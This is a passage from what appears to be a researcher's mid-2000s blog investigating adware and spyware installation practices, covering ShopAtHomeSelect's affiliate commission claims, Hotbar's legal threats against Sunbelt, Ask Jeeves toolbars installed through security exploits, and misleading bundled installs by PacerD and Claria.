More persuasive, in my view, is the theory that affiliate networks declined to punish SAHS because SAHS’s actions are profitable for affiliate networks. When an affiliate merchant pays a commission to an affiliate, that merchant must also pay a fee to the intermediary affiliate network. Commission Junction’s public pricing list reports that this fee is 30% — so for every $1 of commission paid to SAHS, CJ earns another $0.30. As a result, affiliate networks have clear financial incentives to retain even rogue affiliates. (Indeed, at the same time that adware has exploded to infect tens of millions of PCs, CJ and LinkShare are reporting unusually strong earnings. [1, 2])

I don’t want to overstate my worry of affiliate networks’ profit motivation. In recent months, affiliate networks have repeatedly kicked out long-time rule-breakers, even where the rule-breakers make money for the networks. (See e.g. LinkShare kicking out 180solutions, and CJ kicking out 180solutions, Direct Revenue and eXact Advertising.) But these actions generally only occur after an extended period of user and analyst outcry. (See e.g. my writing last summer about 180solutions’ effects on affiliate systems.) In contrast, to date, little attention has been focused on SAHS.

Update (October 14): Commission Junction has removed SAHS from its network, thereby ending SAHS’s relationships with all CJ merchants. No word on similar actions by LinkShare or Performics.

Merchants and Users as Victims

As shown in the example video linked above, SAHS claims affiliate commissions even when users specifically request merchants’ sites. Dell and Buy.com get no bona fide benefit from paying 1%-2% to SAHS, as shown in the videos above. SAHS might claim that it pays users rebates as a way to encourage their purchases from participating merchants. But when SAHS arrives on users’ PCs unrequested, and even without users’ acknowledgement or acceptance of its arrival, users are unlikely to be motivated to make purchases from SAHS-participating merchants. So it’s unclear what benefit SAHS can offer merchants under these circumstances.

Notwithstanding the problems with SAHS’s business, affiliate networks encourage merchants to make payments to SAHS by listing SAHS as an affiliate in good standing, inviting SAHS staff to conferences, and occasionally even giving awards to SAHS. Whether through these network actions or based on merchants’ own failure to diligently investigate, merchants bear the brunt of SAHS’s bad actions — paying out commissions SAHS has not properly earned under stated affiliate network rules.

Users also suffer from SAHS. As a result of the ill-gotten payments paid to SAHS by merchants, SAHS receives funds with which it can and does purchase additional installations from its software distribution partners (including the nonconsensual and tricky installations shown above). Payments from Dell (and other targeted merchants) ultimately help to fund the infection of more users — slowing down more users’ PCs, making more users’ PCs unreliable, and pouring fuel onto the spyware problem. To the extent that affected users respond by buying new PCs, Dell perhaps benefits indirectly — but I gather Dell does not aspire to fund such infections.

SAHS may claim that users benefit from its presence, even if its initial installation was improper. After all, SAHS claims affiliate commissions based on users’ purchases, and SAHS stands ready to refund a share of these commissions to the responsible users. But from the perspective of users who received SAHS without meaningful disclosures, SAHS’s offer is of dubious value. Where a program arrives unrequested, users’ fears of identity theft or fraud will (rightly!) discourage them from providing the personal information necessary to receive a payment (name, address, etc.). SAHS may be offering users legitimate actual payments — but when SAHS’s installation was nonconsensual in the first place, users have no easy way to distinguish SAHS’s offer from a phishing attempt or other scam. Without payment details, SAHS will simply retain users’ funds — giving users no benefit for the unrequested intrusion on their PCs, but giving SAHS extra profits.

This is an unfortunate situation — but it’s not hopeless. Dell, Buy.com, and other affected merchants need not continue to help fund this mess. LinkShare and Commission Junction need not continue to pass money to SAHS from unwitting merchants, nor need they continue taking 30% cuts for themselves. Stay tuned.

Update (September 13): News coverage discusses the problem of SAHS retaining commissions for users who never requested SAHS and never even registered for rebates. CJ claims that they have not confirmed “SAHS performing redirects on unregistered users,” but admits that this would be a “major violation.” I have provided CJ with screenshot and video proof, showing SAHS doing exactly that.

What’s So Hot About Hotbar? updated May 19, 2005

Last week Sunbelt announced that Hotbar sent Sunbelt a Cease and Desist letter, apparently demanding that Sunbelt stop detecting Hotbar software and offering users an option to remove it. I immediately updated my Threats page. But then I started wondering: How does Hotbar get onto users’ PCs? And what does Hotbar do once installed?

My new Hotbar Installs via Banner Ads at Kids Sites shows a variety of unsavory Hotbar practices: Promoting Hotbar advertising software at sites targeting kids, using banners with smiley faces but without mention of ads. Failing to affirmatively show a license agreement, and burying advertising terms so many screens into the license and below such counterintuitively-labeled section headings that users cannot reasonably find the key provisions. First affirmatively mentioning advertising on a screen that offers no Cancel button for users to decline the installation. And ultimately bombarding users with ads in pop-ups, web browser toolbars, Windows Explorer toolbars, auto-opening sidebars, and even desktop icons.

Meanwhile, Hotbar’s C&D indicates that their software is no longer detected by Microsoft Anti-Spyware, Lavasoft Ad-Aware, or McAfee. Why not? Consider Microsoft’s policy statement: “Windows AntiSpyware (Beta) alerts the user to the presence of any automatic pop-up advertising appearing outside the context of the program they are currently using.” This certainly describes Hotbar’s pop-up ads. Yet somehow Hotbar has caused — convinced? persuaded? threatened? — Microsoft not to detect their program.

Of course Hotbar is not the only party to blame. Hotbar’s ads arrive at kids sites through ads syndicated by Fastclick (NASDAQ: FSTC). As a publicly-traded company, surely Fastclick could find a better business than foisting advertising software onto unsuspecting kids.


I’ve recently received a copy of the Cease and Desist letter (PDF) Hotbar sent to Sunbelt. Sunbelt says they’ll be responding shortly, and I’m looking forward to reading their response. Meanwhile, some inaccuracies in the letter are so egregious that I feel obliged to note them immediately.

Hotbar claims to provide its users with “explicit explanations” of its services, and Hotbar therefore claims that users “provide … full conscious consent to each and every aspect of Hotbar software.” That’s not what I’ve seen when I’ve tested Hotbar. Rather, I have observed Hotbar install without even mentioning the word “ads” until a screen at which users aren’t given a “cancel” button. And nowhere does Hotbar affirmatively show users any mention of its numerous forms of ads (pop-ups, pop-unders, toolbar ads, auto-opening sidebars, and even desktop icons). To say Hotbar users “consent to each and every aspect” is truly a puzzling misstatement of the facts — that’s not what I’ve observed, nor is it what I’ve chronicled in screenshots and videos.

Hotbar then claims that Sunbelt “misrepresent[s]” Hotbar when it calls “Hotbar” adware. I don’t get it. How else is Sunbelt supposed to describe a program that tracks users’ online activities and shows ads, including pop-up ads? If Claria is adware — and even Claria says it is! — then surely Hotbar is properly called adware too. Perhaps reasonable people could disagree about the propriety of calling Hotbar spyware. But “adware”? No.

Does Jeeves Ask for Permission?

I continue my misleading installation series with a look at installation practices of Ask Jeeves. My new Ask Jeeves Toolbar Installs via Banner Ads at Kids Sites shows a misleading banner ad particularly likely to target kids. When users click on this banner, AJ neither shows nor references any license agreement. And AJ uses euphemisms like “accessible directly from your browser” rather than explicitly admitting that it will install a web browser toolbar.

But that’s not the worst of AJ’s practices. Over the past six months, I’ve captured a series of videos showing Ask Jeeves’ MyWay and MySearch software installed through security holes — without notice, disclosure, or consent. For example, in a video I made on March 12, I received more than a dozen different programs including the Ask Jeeves MySearch toolbar — without me ever requesting anything, and without me ever clicking “Yes” or “Accept” in any dialog box. Watch the video and see for yourself. Warning: The video is 16+ minutes long. Security exploit occurs at 6:00, and Ask Jeeves MySearch software is first seen at 15:50. In this same testing, I also received installation of 180solutions, multiple programs from eXact Advertising, the IBIS WebSearch toolbar, PeopleOnPage, ShopAtHomeSelect, SurfSideKick, WindUpdates, and many more. The underlying network transmissions show that the security exploit at issue was syndicated through the targetnet.com ad network — Mamma Media, publicly-traded on Nasdaq Small Cap.

I have other videos available upon request, including nonconsensual AJ installations dating back to November 2004. See also my November 2004 exploit video.

I’m surprised that Ask Jeeves allows these nonconsensual installations. Ask Jeeves is a publicly-traded company with a 10-digit valuation (slated to be acquired by InterActiveCorp for $1.85 billion). If Ask Jeeves staff made a serious effort to screen and supervise their distribution partners, they could prevent this kind of mess.


The biggest news last week was a lawsuit filed by the New York Attorney General’s office against Intermix Media, whose KeenValue, IncrediFind, and other programs show popup ads, add extra browser toolbars, and intercept error messages. These practices are objectionable in and of themselves, but the complaint focuses on the programs’ misleading installations. Sometimes the programs install with no notice at all, the complaint says, and sometimes only with hidden or misleading disclosures users are unlikely to notice or understand.

I have the sense that this suit is the first of many. There are certainly plenty of similar offenders, even big companies with major venture capital funding. I have often written about software from 180solutions, Direct Revenue, and eXact Advertising installing through security holes, practices I’ve continued to observe (including in the video linked above). And Claria’s tricky installations share many of the deceptive characteristics the AG attributes to Intermix, like hiding key terms in “lengthy, legalistic license agreements” and using “vague, incomplete” disclosure text. (See NYAG complaint (PDF), paragraph 9.) So I doubt the NY AG’s office would approve of the Ask Jeeves practices I’m documenting today, nor the other misleading tactics on my spyware installation methods index.

Misleading Installations of the Week: PacerD, and Claria’s Dope Wars

It’s Monday morning, so time for more misleading installations. Just like last week, I couldn’t stop at only a single example; again I’m providing two.

PacerD’s misleading pop-ups ask users to “please click yes” to accept “free browser enhancements.” In fact what PacerD offers is an unusually large bundle of a dozen different programs, only some of them disclosed in fine print in PacerD’s mislabeled (apparent, purported) license agreement, which in turn is only shown at a user’s specific request. But click “Yes” once, and your computer will take a turn for the worse, with no subsequent opportunity to cancel.

The PacerD Installation Bundle

As usual, Claria’s approach is somewhat more subtle. When Claria bundles its advertising software with the “Dope Wars” video game, Claria prominently tells users that it will deliver advertising. But Claria mentions effects on privacy only midway through a 43-page license agreement, that begins with three tedious pages of all-caps text. My sense is that few “Dope Wars” players are likely to wade through this lengthy license. So if Dope Wars users install Claria, they’ll do so without first understanding what Claria will do to their PCs.

Claria’s Misleading Installation Methods – Dope Wars

On some level, these two installations could hardly be more different. PacerD installs a dozen programs from numerous different companies; Claria installs just one. PacerD shows a popup while users are just trying to surf the web; Claria’s interruption comes as users are trying to install software they actually want. But in relevant respects, I think these installations are surprisingly similar. For one, both seek to convert users’ computers into advertising channels — tracking what users do, and showing extra advertising. Also, both installations tell users something about the programs they are asked to accept, and both give savvy users an opportunity to learn more, but in each case the prominent on-screen text omits important facts users need to know in order to make sensible choices.